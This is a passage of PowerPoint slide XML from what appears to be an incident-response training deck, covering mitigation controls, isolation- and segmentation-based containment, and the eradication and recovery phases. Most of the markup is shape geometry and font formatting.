            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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API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01561" y="4258436"/>
            <a:ext cx="345376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50"/>
              <a:t>Mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-185"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110"/>
              <a:t>Controls</a:t>
            </a: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71335" y="306451"/>
            <a:ext cx="351155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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Containment</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phase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95188" y="760476"/>
            <a:ext cx="4895088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733288" y="3656076"/>
            <a:ext cx="4905375" cy="3481070"/>
            <a:chOff x="5733288" y="3656076"/>
            <a:chExt cx="4905375" cy="348107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3288" y="3656076"/>
              <a:ext cx="4905375" cy="348081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30083" y="5032248"/>
              <a:ext cx="1316735" cy="122072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883535" y="6387210"/>
            <a:ext cx="2359660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08330" marR="5080" indent="-596265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="35">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Cou</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="20">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="120">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>rme</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="95">
                <a:solidFill>
                  <a:srgbClr val="3B4043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25">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>s  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="25">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>available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161521" y="6406134"/>
            <a:ext cx="24130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>
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Evidence</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="3B4043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B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>collected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53865" y="1933193"/>
            <a:ext cx="7747000" cy="15093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2200" spc="-80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containment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strategy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identified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based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following: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50">
              <a:latin typeface="Microsoft Sans Serif"/>
              <a:cs typeface="Microsoft Sans Serif"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="70485">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Potential</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3B4043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">
                <a:solidFill>
                  <a:srgbClr val="3B4043"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>loss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71335" y="306451"/>
            <a:ext cx="351155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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Containment</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phase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95188" y="760476"/>
            <a:ext cx="4895088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893189" y="3132201"/>
            <a:ext cx="12563475" cy="2369185"/>
            <a:chOff x="1893189" y="3132201"/>
            <a:chExt cx="12563475" cy="2369185"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1914906" y="3141726"/>
              <a:ext cx="8487410" cy="725805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8487410" h="725804">
                  <a:moveTo>
                    <a:pt x="8366252" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="120904" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73830" y="9497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35401" y="35401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9497" y="73830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="725424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8487156" y="725424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8487156" y="120903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8477658" y="73830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8451754" y="35401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8413325" y="9497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8366252" y="0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914906" y="3141726"/>
              <a:ext cx="8487410" cy="725805"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8487410" h="725804">
                  <a:moveTo>
                    <a:pt x="120904" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8366252" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8413325" y="9497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8451754" y="35401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8477658" y="73830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8487156" y="120903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8487156" y="725424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="725424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9497" y="73830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35401" y="35401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73830" y="9497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120904" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0466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902714" y="3691890"/>
              <a:ext cx="12544425" cy="1800225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1800225">
                  <a:moveTo>
                    <a:pt x="12396216" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147828" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101096" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60514" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28517" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7534" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1652015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7534" y="1698747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28517" y="1739329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60514" y="1771326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101096" y="1792309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147828" y="1799844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396216" y="1799844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12442947" y="1792309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12483529" y="1771326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12515526" y="1739329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536509" y="1698747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1652015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536509" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12515526" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12483529" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12442947" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123962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902714" y="3691890"/>
              <a:ext cx="12544425" cy="1800225"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1800225">
                  <a:moveTo>
                    <a:pt x="0" y="147827"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7534" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28517" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60514" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101096" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147828" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396216" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12442947" y="7534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12483529" y="28517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12515526" y="60514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536509" y="101096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="147827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1652015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536509" y="1698747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12515526" y="1739329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12483529" y="1771326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12442947" y="1792309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396216" y="1799844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147828" y="1799844"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101096" y="1792309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60514" y="1771326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28517" y="1739329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7534" y="1698747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1652015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147827"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="04668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098294" y="3219957"/>
            <a:ext cx="5935980" cy="20554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45">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Isolation-based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>containment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5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Removes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affected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system</a:t>
            </a:r>
            <a:endParaRPr sz="22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Disconnects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hosts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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>power</a:t>
            </a:r>
            <a:endParaRPr sz="22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Prevents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hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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communicating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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-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network</a:t>
            </a:r>
            <a:endParaRPr sz="22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Disables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user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accounts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applications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905380" y="5851016"/>
            <a:ext cx="12563475" cy="1875789"/>
            <a:chOff x="1905380" y="5851016"/>
            <a:chExt cx="12563475" cy="1875789"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1925573" y="5860541"/>
              <a:ext cx="8488680" cy="759460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8488680" h="759459">
                  <a:moveTo>
                    <a:pt x="8362187" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="126492" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77259" y="9941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37052" y="37052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9941" y="77259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="126492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="758952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8488680" y="758952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8488680" y="126492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8478738" y="77259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8451627" y="37052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8411420" y="9941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8362187" y="0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925573" y="5860541"/>
              <a:ext cx="8488680" cy="759460"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8488680" h="759459">
                  <a:moveTo>
                    <a:pt x="126492" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8362187" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8411420" y="9941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8451627" y="37052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8478738" y="77259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8488680" y="126492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8488680" y="758952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="758952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="126492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9941" y="77259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37052" y="37052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77259" y="9941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126492" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0466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914905" y="6410705"/>
              <a:ext cx="12544425" cy="1306195"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1306195">
                  <a:moveTo>
                    <a:pt x="12436729" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="107314" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65526" y="8427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31416" y="31416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8427" y="65526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="107315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1198753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8427" y="1240541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31416" y="1274651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65526" y="1297640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107314" y="1306068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12436729" y="1306068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12478517" y="1297640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12512627" y="1274651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535616" y="1240541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1198753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="107315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535616" y="65526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12512627" y="31416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12478517" y="8427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124367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914905" y="6410705"/>
              <a:ext cx="12544425" cy="1306195"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1306195">
                  <a:moveTo>
                    <a:pt x="0" y="107315"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8427" y="65526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31416" y="31416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65526" y="8427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107314" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12436729" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12478517" y="8427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12512627" y="31416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535616" y="65526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="107315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1198753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12535616" y="1240541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12512627" y="1274651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12478517" y="1297640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12436729" y="1306068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107314" y="1306068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65526" y="1297640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31416" y="1274651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8427" y="1240541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1198753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="107315"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="04668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2124582" y="6877557"/>
            <a:ext cx="595947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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Uses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sinkhole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sandbox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analyze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attack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98294" y="5939738"/>
            <a:ext cx="44475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45">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Segmentation-based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>containment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91125" y="1933193"/>
            <a:ext cx="587121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Containment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techniques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can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classified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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>as: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86603" y="306451"/>
            <a:ext cx="60813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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Incident</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Eradication</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="80">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Recovery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08832" y="760476"/>
            <a:ext cx="9067800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12569" y="1882292"/>
            <a:ext cx="13629640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75840" marR="5080" indent="-2263775">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Eradication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attack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tools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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>access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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>methods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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>from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system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very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important.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Recovery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systems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restore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Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>operation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business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workflows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includes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several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steps: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777238" y="4608829"/>
            <a:ext cx="3849370" cy="1805939"/>
            <a:chOff x="1777238" y="4608829"/>
            <a:chExt cx="3849370" cy="1805939"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1789938" y="4621529"/>
              <a:ext cx="3823970" cy="1780539"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3823970" h="1780539">
                  <a:moveTo>
                    <a:pt x="3527044" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="296672" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248554" y="3883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202907" y="15126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160341" y="33117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121468" y="57245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86899" y="86899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57245" y="121468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="160341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="202907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3883" y="248554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="296672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1483360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3883" y="1531477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15126" y="1577124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33117" y="1619690"/>
                  </a:lnTo>
                  <a:lnTo>
